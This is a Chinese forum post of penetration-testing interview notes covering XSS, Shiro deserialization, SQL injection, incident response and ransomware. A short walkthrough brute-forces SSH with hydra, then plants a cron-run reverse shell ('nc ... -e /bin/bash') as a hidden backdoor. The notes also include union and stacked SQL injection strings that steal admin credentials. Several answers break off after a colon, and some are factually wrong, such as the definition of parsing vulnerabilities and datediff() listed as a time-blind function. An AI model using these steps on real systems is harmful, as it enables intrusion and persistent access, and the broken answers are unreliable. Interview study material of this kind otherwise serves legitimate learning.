IT评测·应用市场-qidao123.com

标题: 50道常见高频大厂面试题 [打印本页]

作者: 梦见你的名字    时间: 2023-6-9 02:24
标题: 50道常见高频大厂面试题
https://www.bilibili.com/video/BV1os4y1E7YT/?p=15&share_source=copy_web&vd_source=a867c73df17cfff8d16caf9e5b58a1aa
给你一个站点目标以后如何渗透?

如何验证存在XSS漏洞?

验证存在XSS漏洞有两种办法,一种是手动测试,还有一种是自动化工具。
手动测试第一步:找到用户可以操作的输入点,比如,评论区,URL等等
手动测试第二步:找恶意代码在网页的输出点
手动测试第三步:构造payload进行测试漏洞是否存在
GET和POST的区别?

1、请求数据存放位置不同
get把请求数据放在URL上,以?分割URL和传输数据,以&连接参数;
post把数据放在HTTP数据包里
2、目的不同
get是获取数据,post是修改数据
3、数据大小限制不同
get提交数据最大是2k,实际限制取决于浏览器;
post理论上是没有限制的;
4、传输方式不同
get是header和data一并发送,等待服务器响应200(返回数据)
psot是先发送header等待服务器响应100(continue)后才发送data
5、get请求会被浏览器主动缓存,post不会
shiro反序列化漏洞产生过程和如何利用?

命令--序列化--aes加密--base编码--remberme cookie值
判断是否使用shiro框架,是否有这个字段,这个版本是否存在漏洞
常见应急排查方式

Linux入侵排查思路:
账户安全、历史命令、检查异常端口、检测异常进程、开机启动项、定时任务、服务、异常文件、系统日志、web日志
Windows入侵排查思路:
账户安全、检查异常端口、检测异常进程、开机启动项、定时任务、服务、异常文件、系统日志、web日志webshell、文件修改日期
CSRF、SSRF和重放攻击的区别?

csrf 是客户端请求伪造,ssrf 是服务端请求伪造,重放攻击 是将截获得数据包进行重放,达到身份认证等目的
Java反序列化和Shiro反序列化、PHP反序列化

Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,其作用把对象转换成字节流,便于保存或者传输,而ObjectlnputStream类的readObject()方法用于反序列化,作用就是把字节流还原成对象。
Shiro反序列化主要是Apache Shiro提供了记住密码的功能,用户登录成功后会生成经过加密并编码的cookie,保存在浏览器中方便用户的日常使用。
而服务器对cookie的处理流程就是先获取浏览器上保存的cookie,然后将其base64解码,再进行AES解密,再将其反序列化进行校验,而漏洞就是出现在这里,
AES是一个硬编码有默认密钥,如果程序员没有去修改或者过于简单,那我们就可以进行cookie重构,先构造我们的恶意代码,然后将恶意代码进行序列化,然后AES加密(密钥我们已经爆破出来了),再进行base64编码,形成我们新的cookie,而服务器在处理时就会按照刚才的处理流程,就会在服务端触发我们构造的恶意代码。
一次作业的内容也合并到一起,之后整理
1.请简述渗透测试的基本流程

渗透测试(Penetration Testing)的基本流程通常包括以下几个阶段:
2.渗透测试中被动信息收集的方法有什么?

渗透测试中被动信息收集的方法主要包括以下几个方面:
3.请简述解析漏洞的原理

解析漏洞的原理是通过分析软件或系统中存在的漏洞,找出其根源和可能产生的后果,以便制定有效的修复策略。一般来说,漏洞的原因可以归结为以下几个方面:
4.sql注入有哪些分类?

SQL注入一般可以分为以下几个主要分类:
5.sql注入中时间型盲注有哪些关键函数,它们的作用分别是什么?

时间型盲注是SQL注入攻击的一种类型,它通过注入一些特定的SQL语句来猜测数据库中的一些敏感信息。下面是一些时间型盲注攻击中常用的关键函数:
sleep() 函数可以让程序等待指定的时间,这个时间可以是以秒为单位的任何值。在时间型盲注攻击中,攻击者往往会将 sleep() 函数用于SQL语句中,以便在等待期间获取数据库中的相关信息。
benchmark() 函数可以用于执行一个特定的操作指定次数,然后返回执行时间。在时间型盲注攻击中,攻击者可以在SQL语句中使用 benchmark() 函数,指定一个时间(秒数)和要执行的操作。攻击者会根据返回的响应时间推测特定的条件是否为真或假。
datediff() 函数可以返回两个日期之间的时间差。在时间型盲注攻击中,这个函数可以用于估算两个日期是否存在。
以上函数都是时间型盲注攻击中常用的函数,攻击者在注入 SQL 语句时,往往会通过这些函数来猜测数据库中的敏感信息,然后利用得到的信息进行攻击。为了避免 SQL 注入攻击,开发者需要采取一些安全措施,如使用参数化查询等技术手段。
6.联合查询注入和堆叠注入的区别是什么?

联合查询注入和堆叠注入是两种不同的SQL注入技术,它们的区别在于攻击者构造的恶意注入语句的不同。
联合查询注入(Union-Based Injection)是一种常见的SQL注入技术,攻击者通过构造带有UNION关键字的SQL语句,将自己构造的查询结果并入正常查询结果中,从而获取额外的数据或控制查询结果。例如,攻击者可以使用如下语句:
SELECT name, age FROM users WHERE id=1 UNION SELECT username, password FROM admins WHERE '1'='1'
这条SQL语句会返回users表中id为1的记录以及admins表中所有用户的用户名和密码。如果应用程序对用户输入的参数没有进行充分的验证和过滤,攻击者就可以执行这样的注入攻击,并窃取管理员账号的用户名和密码等敏感信息。
堆叠注入(Stacked Queries Injection)是一种比较高级的SQL注入技术,攻击者可以在一次请求中同时执行多条SQL语句,从而实现更加复杂的攻击。例如,攻击者可以使用如下语句:
SELECT name, age FROM users; INSERT INTO log (user, action, time) VALUES ('attacker', 'hacked into system', NOW());
这条SQL语句会先执行查询操作,然后再插入一条日志记录。如果应用程序没有对该参数进行严格的验证和过滤,攻击者就可以成功执行这样的注入攻击,并在数据库中插入一条日志记录。
因此,联合查询注入和堆叠注入虽然都属于SQL注入攻击,但它们的注入语句构造方式不同,且堆叠注入需要一定的技术水平才能实现。
7.请简述shiro命令执行漏洞的原理

Shiro命令执行漏洞是指攻击者可以通过构造恶意的Shiro请求,使应用程序执行任意系统命令的漏洞。其原理主要包括以下几个步骤:
8.xss和csrf漏洞的区别是什么?

XSS(跨站脚本攻击)和CSRF(跨站请求伪造)都是Web应用程序中常见的安全漏洞,它们具有以下几点区别:
一个告警IP如何判断是否是真实攻击

首先看来源是内网还是外网,再看是否携带恶意payload
内网渗透时如何搭建代理隧道?

frp工具可以将内网的某个端口映射到跳板机器上面的某个端口,然后将跳板机的端口映射到VPS,这样就可以通过VPS去访问内网主机了
Stowaway,可以通过指定agent用户为内网,然后指定admin为跳板机建立连接关系;
横向移动

文件共享符,建立ipc¥  + AT + schtasks
ipc¥ + sc
wmic
IPS和IDS

ips:入侵防御系统
位于防火墙和网络设置之间,检测已知和未知攻击并具有防止攻击的能力
IDS:入侵检测系统
不能反击网络攻击,通过对全网信息的分析,进行告警等;
webshell原理

它是一种网页后门,攻击者在入侵网站后将asp和php后门文件放在网站下,可以使用浏览器来访问后门得到一个命令执行环境,以达到控制网站的目的
应急响应

系统排查
1、基本信息
Windows:systeminfo,msinfo32
Linux:lscpu,uname -a
2、用户信息
Windows:图形界面可以查看隐藏用户,右键管理,本地用户和组里看
Linux:cat /etc/passwd
3、启动项
Windows:msconfig
Linux:cat 相应位置文件
4、计划任务
Windows:图行界面查看即可
Linux:crontab -l
Ssh是什么?

加密的网络传输协议,安全外壳协议,用来远程登录连接时加密传输用的协议;
常见端口和对应服务
22 ssh
445 smb ms17-010
3306 mysql
3389 rdp
80 http
443 https
模拟扫描端口进行攻击
攻击ip:49.234.218.30
本机ip:192.168.121.130
扫描端口发现:22/tcp    open  ssh开启
使用hydra(九头蛇)、msf、美杜莎等进行爆破,撞库
Htdra -L user.txt -P password.txt ssh://192.168.1.1
Ssh root @192.168.1.1
留后门,创建隐藏计划任务,
进入tmp目录 创建 task.sh文件,编辑输入
Nc 192.168.1.1 7777 -e /bin/bash
给执行权限Chmod +x
再创建计划任务crontab,给权限;
Nc -lvp 7777
勒索病毒

WannaCry一种蠕虫式勒索病毒,利用NSA泄露的漏洞EteralBlue(永恒之蓝)进行传播;
WannaCry蠕虫病毒通过ms17-010漏洞感染计算机后植入勒索病毒,导致重要文件被加密,并提示需支付钱以后才能解锁;
至少15个国家30万用户中招,照成损失80亿美元;
特征: 后缀wncry ,启动时会连接一个不存在的url,创建系统服务 mssecsvc2.0,释放路径为Windows目录
Globalmposter,邮件钓鱼,暴力破解远程服务器,扫描内网服务器并人工投放勒索病毒,导致文件被加密,无法解密;
特征:后缀auchentoshan、动物名+444. Rdp爆破,钓鱼邮件,捆绑软件,释放在%appdata%或%localappdata%
Crysis/Dharm,rdp暴力破解,采用AES+RSA,最新版本无法解密;
特征;id+勒索邮箱+特定后缀,位置在startup目录下,或%appdata等;
勒索病毒应急响应

1、        事件判断  判断事件是不是勒索病毒,是那种病毒,可以查后缀和病毒特点
2、        临时处置
3、        信息收集与分析 样本收集,文件排查
4、        事件处置
5、        事件防御
后面没看了,都是很常用的一些工具的利用,这里也没记全,先这样吧,溜了溜了

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!




欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/) Powered by Discuz! X3.4